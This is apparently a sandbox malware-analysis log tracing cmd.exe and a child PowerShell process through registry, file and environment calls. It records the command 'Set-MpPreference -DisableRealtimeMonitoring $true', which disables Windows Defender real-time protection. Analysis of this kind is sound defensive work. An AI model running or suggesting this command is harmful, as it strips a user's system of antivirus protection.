Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xf04, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000001	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #12: powershell.exe

820

Information	Value
ID	#12
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:46, Reason: Child Process
Unmonitor	End Time: 00:01:02, Reason: Self Terminated
Monitor Duration	00:00:15

OS Process Information

Information	Value
PID	0xf04
Parent PID	0xeec (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x F08 0x F20 0x F24 0x F28 0x F2C 0x F30 0x 8C8 0x 834

Threads

Thread 0xf08

600

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	12	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096	17	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096	62	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096	21	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
